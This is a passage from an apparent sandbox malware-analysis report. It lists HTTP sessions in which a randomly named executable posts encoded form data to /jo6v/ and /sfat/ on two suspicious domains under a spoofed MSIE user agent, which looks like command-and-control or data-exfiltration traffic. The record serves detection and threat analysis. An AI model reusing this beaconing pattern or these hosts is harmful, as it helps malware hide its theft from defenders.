                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 37 4f 46 76 2b 45 6c 4f 58 45 65 37 78 41 67 4d 6c 6e 4c 2f 65 33 61 76 57 59 33 64 73 4e 6e 76 37 47 74 50 44 6a 63 44 43 30 6f 6b 35 51 45 6f 50 78 4f 7a 43 4f 65 2b 68 64 64 45 6f 6a 35 42 38 52 6e 2b 79 4c 49 6e 43 78 46 4a 55 39 32 55 56 34 6a 75 53 35 4e 43 36 57 4f 70 46 64 77 51 4b 6c 42 36 46 61 41 54 49 30 45 34 5a 32 65 4b 37 6e 77 2b 74 36 56 30 79 2f 6d 2f 57 54 50 58 76 78 57 47 56 4d 59 75 58 44 76 6e 51 6c 2f 37 64 61 4b 5a 70 71 6c 72 30 4b 4d 46 42 58 78 39 4e 48 56 69 34 31 55 4a 74 77 4f 6a 4a 69 57 46 7a 5a 69 64 43 47 6a 50 70 65 4f 41 63 43 43 36 49 53 4f 6b 77 61 66 58 45 4e 77 65 77 48 72 74 4c 48 4a 67 63 65 4f 63 59 73 57 38
                                                                                                                    Data Ascii: FbuX5DnP=7OFv+ElOXEe7xAgMlnL/e3avWY3dsNnv7GtPDjcDC0ok5QEoPxOzCOe+hddEoj5B8Rn+yLInCxFJU92UV4juS5NC6WOpFdwQKlB6FaATI0E4Z2eK7nw+t6V0y/m/WTPXvxWGVMYuXDvnQl/7daKZpqlr0KMFBXx9NHVi41UJtwOjJiWFzZidCGjPpeOAcCC6ISOkwafXENwewHrtLHJgceOcYsW8
                                                                                                                    Sep 30, 2024 19:59:10.895567894 CEST302INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:10 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 138
                                                                                                                    Connection: close
                                                                                                                    ETag: "66aa3fcf-8a"
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    35192.168.2.549747206.119.82.147804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:12.562268019 CEST1762OUTPOST /jo6v/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.wdeb18.top
                                                                                                                    Origin: http://www.wdeb18.top
                                                                                                                    Referer: http://www.wdeb18.top/jo6v/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 37 4f 46 76 2b 45 6c 4f 58 45 65 37 78 41 67 4d 6c 6e 4c 2f 65 33 61 76 57 59 33 64 73 4e 6e 76 37 47 74 50 44 6a 63 44 43 30 67 6b 34 6d 51 6f 65 69 32 7a 44 4f 65 2b 2f 74 64 46 6f 6a 34 54 38 52 76 36 79 4c 46 53 43 33 42 4a 55 61 32 55 58 4a 6a 75 62 35 4e 43 79 32 50 75 4b 39 78 53 4b 6d 34 7a 46 61 51 54 49 30 45 34 5a 31 32 4b 38 31 59 2b 68 61 56 72 31 2f 6d 37 42 44 50 7a 76 77 2f 7a 56 50 30 59 51 7a 50 6e 51 46 76 37 66 73 6d 5a 6f 4b 6c 70 31 4b 4e 47 42 58 4e 63 4e 47 35 6d 34 30 68 6b 74 33 36 6a 49 45 76 4d 32 59 48 62 41 32 6d 73 37 50 75 54 43 47 76 66 49 42 79 79 79 36 6e 66 4a 4d 49 38 6c 44 54 51 50 58 59 32 43 4a 65 48 64 36 48 42 73 62 6e 76 75 74 61 31 47 33 34 49 50 6d 5a 54 4b 58 6b 65 54 38 79 71 4a 42 6a 52 68 38 77 36 53 56 63 6f 37 38 6b 56 54 75 62 4a 30 6c 5a 4e 62 78 38 66 2b 67 66 7a 70 52 68 6b 67 67 30 41 4b 4f 48 46 34 7a 6e 44 73 66 75 51 2b 4b 50 67 33 6c 58 36 74 49 51 4e 47 6f 63 61 67 46 50 4f 6d 4c 66 74 37 6d 44 74 74 33 6c 75 45 [TRUNCATED]
                                                                                                                    Data Ascii: FbuX5DnP=7OFv+ElOXEe7xAgMlnL/e3avWY3dsNnv7GtPDjcDC0gk4mQoei2zDOe+/tdFoj4T8Rv6yLFSC3BJUa2UXJjub5NCy2PuK9xSKm4zFaQTI0E4Z12K81Y+haVr1/m7BDPzvw/zVP0YQzPnQFv7fsmZoKlp1KNGBXNcNG5m40hkt36jIEvM2YHbA2ms7PuTCGvfIByyy6nfJMI8lDTQPXY2CJeHd6HBsbnvuta1G34IPmZTKXkeT8yqJBjRh8w6SVco78kVTubJ0lZNbx8f+gfzpRhkgg0AKOHF4znDsfuQ+KPg3lX6tIQNGocagFPOmLft7mDtt3luEmqUQd9Fvpalilk1Xhkrgb1taDio5538gYOI1tewjeASN7SmNVTjPSvKpOCIyhogDJ8vQudrv+uYsw9xvNCwmr0k2V1AqnuHRv70BayFMk3khwZ/gl4DlMoy4Ujnm5guxEcYnuy2VDjLYZrG2wjrz2Pk7kIPuG2F2vjGCtuKHJUUd4H/38O2UBn8AeDhqgOJ0QMbXzYY/CgDWnHXK49K3SHqDi3KmXwuH6SAqSFsWWNbAjGoM9QVbJ63ST1lGVtipmhNRoY6r68bqAaxMn/9SkfFmRa/jZr6ZJGyUd9o40rnMnO0lqb27+4ouetcUauYnRuUnqeLw9HBA0ebfF4Q7qbIWHd+nxZ/ZD+IE6Wbp+gRwVKXDW/JV6gGJUvFvfldegdJM7uxRZecSfvycKLQZBI2UPzuSx8JbFgf7TTZBqiO+Bcr8iIO+40NyPjrwkbL565ffTGiGOhTtVBzFZQ3hTW/q62sg+8IrPwUgdeCguNvTTblFEM0kQDhpgR0efmzA4RCgrovzEg5GRN1nBe9G8AaTDsaOBQvOT6u6/TU3Cgo8BIGjuQ2AKrFxj2u7JmPjoi/Ii0wWr1MsowHfnXYO6VtGGKUgj8aU6ZNuPJIwxRQwG1sRSuyMbsjAP0kDLZRmbEYprL7eJmon7B/NAZzEMWV/ZwCoaAr5Nj [TRUNCATED]
                                                                                                                    Sep 30, 2024 19:59:13.747503042 CEST302INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:13 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 138
                                                                                                                    Connection: close
                                                                                                                    ETag: "66aa3fcf-8a"
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    36192.168.2.549748206.119.82.147804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:15.111902952 CEST471OUTGET /jo6v/?FbuX5DnP=2MtP9xsvcXKXviIsu0vpU2PONZvfmv7hx3sLTV54B3JqqEM7biiUK4O8idRTqEg/3Cvc/KoIDU0zY+SEf5yzUNBsxxGwA99CFGRROpYSVV0FKk6l03kHnIpY1s/MIxOd0w==&2Zv0=qtmpl4wh HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.wdeb18.top
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:59:16.057387114 CEST302INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:15 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 138
                                                                                                                    Connection: close
                                                                                                                    ETag: "66aa3fcf-8a"
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    37192.168.2.54974946.17.172.49804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:21.781487942 CEST752OUTPOST /sfat/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.galaxyslot88rtp.lat
                                                                                                                    Origin: http://www.galaxyslot88rtp.lat
                                                                                                                    Referer: http://www.galaxyslot88rtp.lat/sfat/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 71 66 34 78 58 6d 66 4c 69 78 4f 47 33 4e 62 47 66 32 2b 52 37 33 4b 72 32 77 42 44 36 5a 39 31 59 4e 66 52 48 6d 6b 34 6f 42 73 68 48 50 37 4c 4b 78 2b 6d 58 65 37 66 65 47 31 41 52 63 58 62 77 45 79 56 7a 74 59 6c 72 6e 38 70 67 45 41 67 4d 44 63 4d 68 7a 70 66 77 68 4a 78 67 4a 34 74 56 45 64 4a 53 4b 51 52 5a 54 6f 66 79 6c 58 45 71 45 45 67 54 36 33 6e 42 75 31 64 45 6d 65 55 43 49 76 4f 33 41 32 74 67 4e 6d 5a 57 35 33 2f 6d 64 37 45 59 37 65 55 2f 63 34 52 51 2f 67 37 4d 4a 6c 6c 44 73 64 72 4f 4e 4d 64 76 47 4a 43 73 30 62 67 5a 63 45 45 4d 50 31 70 45 44 36 6f 76 50 53 45 52 50 59 3d
                                                                                                                    Data Ascii: FbuX5DnP=qf4xXmfLixOG3NbGf2+R73Kr2wBD6Z91YNfRHmk4oBshHP7LKx+mXe7feG1ARcXbwEyVztYlrn8pgEAgMDcMhzpfwhJxgJ4tVEdJSKQRZTofylXEqEEgT63nBu1dEmeUCIvO3A2tgNmZW53/md7EY7eU/c4RQ/g7MJllDsdrONMdvGJCs0bgZcEEMP1pED6ovPSERPY=
                                                                                                                    Sep 30, 2024 19:59:23.008210897 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    pragma: no-cache
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 1251
                                                                                                                    date: Mon, 30 Sep 2024 17:59:22 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    platform: hostinger
                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    vary: User-Agent
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                                                                    Sep 30, 2024 19:59:23.008272886 CEST431INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78
                                                                                                                    Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    38192.168.2.54975046.17.172.49804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:24.334729910 CEST772OUTPOST /sfat/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.galaxyslot88rtp.lat
                                                                                                                    Origin: http://www.galaxyslot88rtp.lat
                                                                                                                    Referer: http://www.galaxyslot88rtp.lat/sfat/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 71 66 34 78 58 6d 66 4c 69 78 4f 47 6c 39 72 47 64 56 47 52 71 48 4b 6f 7a 77 42 44 7a 35 38 38 59 4e 54 52 48 6a 56 6a 6f 79 59 68 47 71 66 4c 4c 7a 57 6d 57 65 37 66 4c 32 31 4a 4d 4d 58 53 77 45 2b 64 7a 73 6b 6c 72 6b 41 70 67 47 59 67 4d 77 30 50 67 6a 70 4b 2f 42 4a 67 76 70 34 74 56 45 64 4a 53 4b 55 37 5a 54 67 66 79 31 6e 45 72 68 77 68 4e 4b 33 6f 43 75 31 64 41 6d 65 50 43 49 75 62 33 42 71 48 67 4c 71 5a 57 39 7a 2f 6d 4d 37 48 53 37 65 65 78 38 35 66 57 4e 51 7a 42 62 70 77 47 50 42 75 58 50 49 44 75 77 6b 6f 32 57 54 49 4b 38 6f 38 63 63 39 65 56 7a 62 42 31 73 43 30 50 59 50 64 61 63 7a 2f 41 31 77 4d 47 72 49 4d 65 54 52 57 54 62 55 37
                                                                                                                    Data Ascii: FbuX5DnP=qf4xXmfLixOGl9rGdVGRqHKozwBDz588YNTRHjVjoyYhGqfLLzWmWe7fL21JMMXSwE+dzsklrkApgGYgMw0PgjpK/BJgvp4tVEdJSKU7ZTgfy1nErhwhNK3oCu1dAmePCIub3BqHgLqZW9z/mM7HS7eex85fWNQzBbpwGPBuXPIDuwko2WTIK8o8cc9eVzbB1sC0PYPdacz/A1wMGrIMeTRWTbU7
                                                                                                                    Sep 30, 2024 19:59:25.283422947 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    pragma: no-cache
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 1251
                                                                                                                    date: Mon, 30 Sep 2024 17:59:25 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    platform: hostinger
                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    vary: User-Agent
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                                                                    Sep 30, 2024 19:59:25.283484936 CEST431INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78
                                                                                                                    Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    39192.168.2.54975146.17.172.49804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:26.874069929 CEST1789OUTPOST /sfat/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.galaxyslot88rtp.lat
                                                                                                                    Origin: http://www.galaxyslot88rtp.lat
                                                                                                                    Referer: http://www.galaxyslot88rtp.lat/sfat/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 71 66 34 78 58 6d 66 4c 69 78 4f 47 6c 39 72 47 64 56 47 52 71 48 4b 6f 7a 77 42 44 7a 35 38 38 59 4e 54 52 48 6a 56 6a 6f 79 41 68 48 59 58 4c 45 79 57 6d 51 75 37 66 58 6d 31 4d 4d 4d 57 41 77 45 32 5a 7a 73 70 53 72 68 45 70 6a 6e 34 67 45 68 30 50 75 6a 70 4b 6e 78 49 6e 67 4a 34 43 56 43 39 4e 53 4b 45 37 5a 54 67 66 79 32 2f 45 69 55 45 68 50 4b 33 6e 42 75 31 61 45 6d 66 42 43 49 6e 73 33 42 65 39 6a 37 4b 5a 59 39 6a 2f 71 65 54 48 49 37 65 51 32 38 34 43 57 4e 64 74 42 62 31 38 47 4d 63 42 58 4e 59 44 75 45 31 76 76 47 66 50 51 75 67 2b 4f 74 63 35 4b 45 66 79 31 63 79 62 43 75 66 44 52 6f 66 68 47 41 73 2b 46 34 78 6f 42 6c 78 46 61 73 39 6a 71 61 4e 47 6a 58 68 31 73 5a 78 74 45 6e 37 75 68 71 35 4b 70 6a 7a 4b 55 45 4f 4e 48 6a 4a 47 79 6d 2f 31 6d 6b 59 30 2f 48 56 66 68 41 58 4d 78 47 52 58 53 65 59 64 6b 6a 31 56 55 4b 31 51 39 77 6d 63 6e 6b 54 32 46 4e 35 58 33 36 59 75 6c 33 72 56 76 38 7a 4a 69 43 75 72 57 64 57 45 79 45 75 48 6d 63 68 63 50 57 63 6d 45 [TRUNCATED]
                                                                                                                    Data Ascii: FbuX5DnP=qf4xXmfLixOGl9rGdVGRqHKozwBDz588YNTRHjVjoyAhHYXLEyWmQu7fXm1MMMWAwE2ZzspSrhEpjn4gEh0PujpKnxIngJ4CVC9NSKE7ZTgfy2/EiUEhPK3nBu1aEmfBCIns3Be9j7KZY9j/qeTHI7eQ284CWNdtBb18GMcBXNYDuE1vvGfPQug+Otc5KEfy1cybCufDRofhGAs+F4xoBlxFas9jqaNGjXh1sZxtEn7uhq5KpjzKUEONHjJGym/1mkY0/HVfhAXMxGRXSeYdkj1VUK1Q9wmcnkT2FN5X36Yul3rVv8zJiCurWdWEyEuHmchcPWcmEVCZTqkZoQf/BDP1O49sxpgYWxi5wMQrk8pWCl90KBCLhODPiC7ROJ16T0PYF6OCMZ7Qm46iAELi7mBEurlvt59j/5QhhmAQKId7NY4HYQZo/d2GuJOJGiz1pGMvyZ4PBAHZzmz+qdCWdwaQdErLRv8YeO/VIuPiJCIsqtBX8zNqQyZYgfHArzyjnPZCq0y69EbACx/gDUVdiDyce5/WIqTvt327shxKMsD1p01PowBz3k6mIwRPBjJC9i9FHmlLNZ47/NgDDfN3miFtx4JiRtzQ+n32t6Lqq2oYSmcns+vHiZ749ZzGMbS6bQyBaWnjcUngfKzAidvRmFUJ6jOfp+DbbFsnbq/C9/vBPUBtiM9HmT2usejQUkXppwVyAznaAuZprmKtjS2J8QXhc+2Sp8V1D9mhH6vnSAVuzn+71Myi7LglgElq+u2Bjo05d5JMijlGdQ2K2ideQWX8C+RP6qa8c2WfOeJY0yxjgIJwDnFzc1xMkseMe9yvjo3UXxBcYfjWiYnF0+q5NSicDJr3ir7HE349xqBcoyUWJ1f1jFmUHYHSTVGhRxBpgDY571OtmH0HI9ADKQOzml+xUDBs4xA/Nu18UEBYgPSzgrSKF4lB5QNGnFLGG2cmdQzATZEJtHgXynfejrUCjkqw3PCOpUdq9tDPR5e4A/9 [TRUNCATED]
                                                                                                                    Sep 30, 2024 19:59:27.967957973 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    pragma: no-cache
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 1251
                                                                                                                    date: Mon, 30 Sep 2024 17:59:27 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    platform: hostinger
                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    vary: User-Agent
